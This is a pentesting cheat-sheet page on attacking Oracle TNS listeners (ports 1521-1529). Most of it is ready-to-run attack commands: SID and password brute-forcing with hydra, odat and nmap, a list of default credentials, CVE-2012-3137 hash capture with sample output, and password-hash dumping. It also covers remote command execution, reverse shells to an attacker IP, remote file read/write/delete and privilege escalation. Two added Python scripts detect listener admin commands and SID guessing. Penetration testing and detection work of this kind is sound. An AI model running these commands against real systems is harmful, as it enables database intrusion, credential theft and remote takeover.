Infiltr8: The Red-Book
Oracle TNS

Pentesting Oracle TNS - TCP Ports 1521,1522-1529

Last updated 5 months ago


Theory

Oracle clients communicate with the database using the Transparent Network Substrate (TNS) protocol. When the listener receives a connection request (1521/TCP by default; you may also find secondary listeners on 1522-1529), it starts a new database process and establishes a connection between the client and the Oracle database.

Practice

Enumerate version

Using nmap scripts, we can enumerate the version of the TNS-Listener:

nmap --script "oracle-tns-version" -p 1521 -T4 -sV <IP>

We can also enumerate the TNS-Listener version with tnscmd10g:

tnscmd10g version -p 1521 -h <IP>

Commands & Brute-force

When enumerating Oracle, the first step is to talk to the TNS-Listener:

# Return the current status and variables used by the listener
tnscmd10g status -p 1521 -h <IP>

# Dump service data
tnscmd10g services -p 1521 -h <IP>

# Dump debugging information to the listener log
tnscmd10g debug -p 1521 -h <IP>

# Write the listener configuration file to a backup location
tnscmd10g save_config -p 1521 -h <IP>

If you receive an error, it may be because the TNS versions are incompatible (use the --10G parameter with tnscmd10g); if the error persists, the listener may be password protected.

We can use hydra to brute-force the TNS-Listener password:

hydra -P rockyou.txt -t 32 -s 1521 <IP> oracle-listener
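The listener commands above (status, services, version, debug, save_config) travel inside the connect string of a TNS CONNECT packet, before any database authentication. As an added example (not from the Red-Book or from tnscmd10g), the parser below decodes that packet and flags such administrative commands in captured traffic; the builder only produces offline test fixtures. The connect-header constants and the 58-byte connect-data offset are assumed to be the classic pre-12.2 layout.

```python
import re
import struct

# TNS packet types (8-byte header, byte 4)
TNS_CONNECT, TNS_ACCEPT, TNS_REFUSE, TNS_REDIRECT, TNS_DATA = 1, 2, 4, 5, 6

# Listener administrative commands named on this page; they ride in the CONNECT
# packet's connect string, so a passive observer can spot them without DB auth.
ADMIN_COMMANDS = {"status", "services", "version", "debug", "save_config"}
CMD_RE = re.compile(r"\(COMMAND=([A-Za-z_]+)\)")

# Offset of the connect string in a CONNECT packet (assumed typical value)
CONNECT_DATA_OFFSET = 58


def build_connect_packet(connect_data: str) -> bytes:
    """Build a pre-12.2 style TNS CONNECT packet (used here only for test fixtures)."""
    body = connect_data.encode("ascii")
    total = CONNECT_DATA_OFFSET + len(body)
    # TNS header: packet length, packet checksum, type, flags, header checksum
    header = struct.pack(">HHBBH", total, 0, TNS_CONNECT, 0, 0)
    # Connect header: version 310, compat 300, service options, SDU, TDU, NT
    # characteristics, line turnaround, hardware "1", connect data length,
    # connect data offset, max receivable connect data, two flag bytes, then
    # zeroed trace/padding bytes up to the connect data offset.
    chdr = struct.pack(">HHHHHHHHHHIBB", 0x0136, 0x012C, 0x0C41, 2048, 32767,
                       0x4F98, 0, 1, len(body), CONNECT_DATA_OFFSET, 0x800, 0x41, 0x41)
    chdr += b"\x00" * (CONNECT_DATA_OFFSET - 8 - len(chdr))
    return header + chdr + body


def parse_tns_packet(pkt: bytes) -> dict:
    """Decode the TNS header and, for CONNECT packets, the connect string.

    The initial CONNECT always carries the 2-byte length header; the 4-byte
    length of 12.2+ (TNS version 315) only applies after version negotiation."""
    if len(pkt) < 8:
        raise ValueError("truncated TNS header")
    length, _chksum, ptype, flags, _hchksum = struct.unpack(">HHBBH", pkt[:8])
    if length > len(pkt):
        raise ValueError(f"declared length {length} exceeds buffer {len(pkt)}")
    info = {"length": length, "type": ptype, "flags": flags, "connect_data": None}
    if ptype == TNS_CONNECT:
        if length < 28:
            raise ValueError("truncated CONNECT packet")
        cd_len, cd_off = struct.unpack(">HH", pkt[24:28])  # length and offset fields
        if cd_off + cd_len > length:
            raise ValueError("connect data runs past the packet end")
        info["connect_data"] = pkt[cd_off:cd_off + cd_len].decode("latin-1")
    return info


def listener_command(connect_data):
    """Return the lower-cased listener COMMAND in a connect string, or None."""
    m = CMD_RE.search(connect_data or "")
    return m.group(1).lower() if m else None


def flag_admin_commands(packets):
    """Return [(index, command)] for each CONNECT carrying a listener admin command."""
    hits = []
    for i, pkt in enumerate(packets):
        try:
            info = parse_tns_packet(pkt)
        except ValueError:
            continue  # malformed or truncated: nothing to inspect
        cmd = listener_command(info["connect_data"])
        if cmd in ADMIN_COMMANDS:
            hits.append((i, cmd))
    return hits


if __name__ == "__main__":
    # Constructed sample traffic: a tnscmd10g-style status request, a normal
    # client connect to service "orcl" on the page's host, and a runt to skip.
    sample = [build_connect_packet("(CONNECT_DATA=(COMMAND=status))"),
              build_connect_packet("(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl))"
                                   "(ADDRESS=(PROTOCOL=TCP)(HOST=10.11.21.30)(PORT=1521)))"),
              b"\x00\x05"]
    print(flag_admin_commands(sample))  # [(0, 'status')]
```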

Targeting SID

The SID (Service Identifier) is essentially the database name. Depending on the install you may have one or more default SIDs, or even a totally custom, DBA-defined SID.

#Using Hydra
hydra -L sid.txt -s 1521 <IP> oracle-sid

#Using odat
odat sidguesser -s $SERVER -p 1521 --sids-file=./sids.txt

# Interesting wordlists
cat /usr/share/metasploit-framework/data/wordlists/sid.txt
cat /usr/share/nmap/nselib/data/oracle-sids

In some old versions (it works on 9) we can enumerate the SID using tnscmd10g:

#The SIDs are listed inside: SERVICE=(SERVICE_NAME=<SID_NAME>)
tnscmd10g status -p 1521 -h <IP>
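Every SID guess above lands in the listener's own log as an "establish" event with return code 12505 or 12514 (unknown SID / service name). As an added example (not from the Red-Book or from the tools it cites), this script parses listener.log establish entries and flags client hosts that burn through several unknown names in a short window. The sample log lines are constructed; the client IP 10.11.21.5 and the program/host values in them are assumed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# listener.log "establish" entries use the documented layout:
#   <timestamp> * <connect data> * <protocol address> * establish * <service> * <return code>
# Return code 0 is a successful hand-off; 12505/12514 mean the SID or service
# name in the connect descriptor is unknown to the listener.
LINE_RE = re.compile(r"^(?P<ts>\d{2}-[A-Z]{3}-\d{4} \d{2}:\d{2}:\d{2}) \* (?P<rest>.*)$")
HOST_RE = re.compile(r"\(HOST=(?P<host>[^)]+)\)")
NAME_RE = re.compile(r"\((?:SID|SERVICE_NAME)=(?P<name>[^)]+)\)")
UNKNOWN_SID_CODES = {"12505", "12514"}


def parse_establish(line):
    """Return (timestamp, client_host, requested_sid_or_service, return_code), or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    fields = [f.strip() for f in m.group("rest").split(" * ")]
    if len(fields) != 5 or fields[2] != "establish":
        return None  # lsnrctl commands and other event types have a different shape
    connect_data, address, _event, _service, code = fields
    host = HOST_RE.search(address)  # client address, not the CID HOST in connect data
    name = NAME_RE.search(connect_data)
    ts = datetime.strptime(m.group("ts"), "%d-%b-%Y %H:%M:%S")
    return ts, host.group("host") if host else "?", name.group("name") if name else "?", code


def detect_sid_guessing(lines, threshold=5, window=timedelta(seconds=60)):
    """Map client host -> sorted names tried, for hosts with >= threshold
    unknown-SID/service failures inside any span of `window` length."""
    failures = defaultdict(list)
    for line in lines:
        rec = parse_establish(line)
        if rec and rec[3] in UNKNOWN_SID_CODES:
            failures[rec[1]].append((rec[0], rec[2]))
    alerts = {}
    for host, events in failures.items():
        events.sort()
        for i in range(len(events)):
            j = i
            while j < len(events) and events[j][0] - events[i][0] <= window:
                j += 1
            if j - i >= threshold:
                alerts[host] = sorted({n for _, n in events[i:j]})
                break
    return alerts


# Constructed sample: one client walks a SID wordlist, an app host has a single
# typo, and both eventually reach the real SID DB11g from the nmap run below.
SAMPLE_LOG = """\
02-MAR-2016 14:58:01 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=sqlplus)(HOST=kali)(USER=root))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.11.21.5)(PORT=43210)) * establish * ORCL * 12505
02-MAR-2016 14:58:02 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=sqlplus)(HOST=kali)(USER=root))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.11.21.5)(PORT=43211)) * establish * XE * 12505
02-MAR-2016 14:58:03 * (CONNECT_DATA=(SERVICE_NAME=PROD)(CID=(PROGRAM=sqlplus)(HOST=kali)(USER=root))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.11.21.5)(PORT=43212)) * establish * PROD * 12514
02-MAR-2016 14:58:04 * (CONNECT_DATA=(SID=TEST)(CID=(PROGRAM=sqlplus)(HOST=kali)(USER=root))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.11.21.5)(PORT=43213)) * establish * TEST * 12505
02-MAR-2016 14:58:05 * (CONNECT_DATA=(SID=DEV)(CID=(PROGRAM=sqlplus)(HOST=kali)(USER=root))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.11.21.5)(PORT=43214)) * establish * DEV * 12505
02-MAR-2016 14:58:06 * (CONNECT_DATA=(SID=DB11g)(CID=(PROGRAM=sqlplus)(HOST=kali)(USER=root))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.11.21.5)(PORT=43215)) * establish * DB11g * 0
02-MAR-2016 14:59:30 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=app)(HOST=web01)(USER=oracle))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.11.21.7)(PORT=51000)) * establish * ORCL * 12505
02-MAR-2016 14:59:31 * (CONNECT_DATA=(SID=DB11g)(CID=(PROGRAM=app)(HOST=web01)(USER=oracle))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.11.21.7)(PORT=51001)) * establish * DB11g * 0
"""


def run_sample():
    return detect_sid_guessing(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    print(run_sample())  # {'10.11.21.5': ['DEV', 'ORCL', 'PROD', 'TEST', 'XE']}
```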

Targeting Accounts

Once we have found a valid SID, the next step is account enumeration: from this point, you can connect to the listener and brute-force credentials.

#Odat
odat passwordguesser -s $SERVER -d $SID
odat passwordguesser -s $SERVER -d $SID -p 1521 --accounts-files users.txt pass.txt

#Hydra
hydra -L /tmp/user.txt -P /tmp/pass.txt -s 1521 $SERVER oracle /$SID

#Nmap
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=$SID $SERVER
# User/Password list
cat /usr/share/nmap/nselib/data/oracle-default-accounts.lst

# User/Password list
cat /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt

# User/Password list
cat /usr/share/oscanner/accounts.default

Below are some of the default passwords associated with Oracle:

  • DBSNMP/DBSNMP  —  Intelligent Agent uses this to talk to the db server (it takes some work to change it)

  • SYS/CHANGE_ON_INSTALL  —  Default sysdba account before and including Oracle v9, as of version 10g this has to be different!

  • PCMS_SYS/PCMS_SYS  —  Default x account

  • WMSYS/WMSYS  —  Default x account

  • OUTLN/OUTLN  —  Default x account

  • SCOTT/TIGER  —  Default x account

Stealremotepwds - CVE-2012-3137

Versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3 are vulnerable to this technique.

Using nmap we can intercept the initial traffic of the authentication phase and extract a hash to brute-force offline:

root@kali:~# nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30

Starting Nmap 6.49BETA4 (https://nmap.org) at 2016-03-02 14:58 EST
Nmap scan report for 10.11.21.30
PORT     STATE SERVICE
1521/tcp open  oracle
| oracle-brute-stealth:
|   Accounts
|     SYS:$o5logon$1245C95384E15E7F0C893FCD1893D8E19078170867E892CE86DF90880E09FAD3B4832CBCFDAC1A821D2EA8E3D2209DB6*4202433F49DE9AE72AE2 - Hashed valid or invalid credentials
|   Statistics
|_    Performed 241 guesses in 12 seconds, average tps: 20

john hashes.txt

Also, we can use odat

# Test module
odat stealremotepwds -s <IP> -U <username> -P <password> -d <SID> --test-module

# Obtain the session key and salt for user list
odat stealremotepwds -s <IP> -U <username> -P <password> -d <SID> --get-all-passwords --user-list /usr/share/nmap/nselib/data/oracle-default-accounts.lst

Dump Oracle Hashes

Password hashes in Oracle are stored in the sys.user$ or dba_users tables. With sufficient privileges, we can extract them using odat.

You may need to add --sysdba to make it work.

# Test the module before using it
odat passwordstealer -s <IP> -U <username> -P <password> -d <SID> --test-module

# Dump hashes
odat passwordstealer -s <IP> -U <username> -P <password> -d <SID> --get-passwords

# Dump hashes indirectly with CVE-2020-2984 (12c or higher)
odat passwordstealer -s <IP> -U <username> -P <password> -d <SID> --get-passwords-ocm

# Dump hashes from history
odat passwordstealer -s <IP> -U <username> -P <password> -d <SID> --get-passwords-from-history

# Dump hashes with DBMS_STATS
odat passwordstealer -s <IP> -U <username> -P <password> -d <SID> --get-passwords-dbms-stats

Logging into a Remote Database

sqlplus <username>/<password>@<ip_address>:<port>/<SID>

If an account has system database privileges (sysdba) or system operator privileges (sysoper) you may wish to try the following:

sqlplus <username>/<password>@<ip_address>/<SID> 'as sysdba'
sqlplus <username>/<password>@<ip_address>/<SID> 'as sysoper'

Remote Code Execution

If an account has system database privileges (sysdba) or system operator privileges (sysoper), add the matching argument when using odat:

--sysdba
--sysoper

Java Stored Procedures:

# Execute commands
odat java -s <IP> -U <username> -P <password> -d <SID> --exec COMMAND

# Get a reverse shell
odat java -s <IP> -d <SID> -U <username> -P <password> --reverse-shell <ATTACKING_IP> <PORT>

Oracle Scheduler:

# Execute commands
odat dbmsscheduler -s <IP> -d <SID> -U <username> -P <password> --exec "C:\windows\system32\cmd.exe /c echo 123>>C:\hacK"

# Get a reverse shell
odat dbmsscheduler -s <IP> -d <SID> -U <username> -P <password> --reverse-shell <ATTACKING_IP> <PORT>

Oracle External Tables:

# Execute a binary located in the given directory
odat externaltable -s <IP> -U <username> -P <password> -d <SID> --exec "C:/windows/system32" "calc.exe"

Read/Write files

#Read file
odat utlfile -s <IP> -d <SID> -U <username> -P <password> --getFile "C:/RemotePath" remote_file.txt local_file.txt

#Write file
odat utlfile -s <IP> -d <SID> -U <username> -P <password> --putFile "C:/RemotePath" remote_file.txt local_file.txt

#Remove file
odat utlfile -s <IP> -d <SID> -U <username> -P <password> --removeFile "C:/RemotePath" remote_file.txt

#Read file (Oracle External Tables)
odat externaltable -s <IP> -U <username> -P <password> -d <SID> --getFile "C:/RemotePath" remote_file.txt local_file.txt

OracleSQL Privilege Escalation

#Get module Help
odat privesc -s $SERVER -d $SID -U $USER -P $PASSWORD -h

Automation Tools

An interesting tool is oscanner, which will try to find valid SIDs, then brute-force valid credentials for them and extract some information:

#apt install oscanner
oscanner -s <IP> -P <PORT>

odat's all module chains the same steps:

# Bruteforce SID and check all
odat all -s <IP> -p <PORT>

# Bruteforce accounts for that SID and check all
odat all -s <IP> -p <PORT> -d <SID>

# Check all for that account
odat all -s <IP> -p <PORT> -d <SID> -U <USER> -P <PASSWORD>

# Check all for that account as SYSDBA or SYSOPER
odat all -s <IP> -p <PORT> -d <SID> -U <USER> -P <PASSWORD> --sysdba
odat all -s <IP> -p <PORT> -d <SID> -U <USER> -P <PASSWORD> --sysoper

Resources

We can brute-force the SID using tnscmd10g or Hydra.

We can use odat, Hydra or nmap to brute-force accounts on a known SID.

Mixed wordlists are available from odat and nmap (see the paths above), plus other interesting ones from hacktricks and the attached pass-oracle.txt and users-oracle.txt.

Other default passwords can be found in the default-account lists listed under Targeting Accounts.

To log in using known credentials, we can use sqlplus.

We can try to execute code using odat and Java Stored Procedures.

We can try to execute code using odat and Oracle Scheduler.

We can try to execute code using odat and Oracle External Tables.

ODAT requires the privilege 'CREATE ANY DIRECTORY', which, by default, is granted only to the DBA role, since it attempts to execute the file from any directory and not only "your" directory (the manual version of this attack requires fewer privileges).

We can try to read/write files using odat and utlfile.

We can try to read files using odat and Oracle External Tables.

We may use the privesc module from odat to escalate our privileges on the DB; it offers several ways to escalate privileges.

Another tool that will do all of this is odat.

Reference: HackTricks, "1521,1522-1529 - Pentesting Oracle TNS Listener".
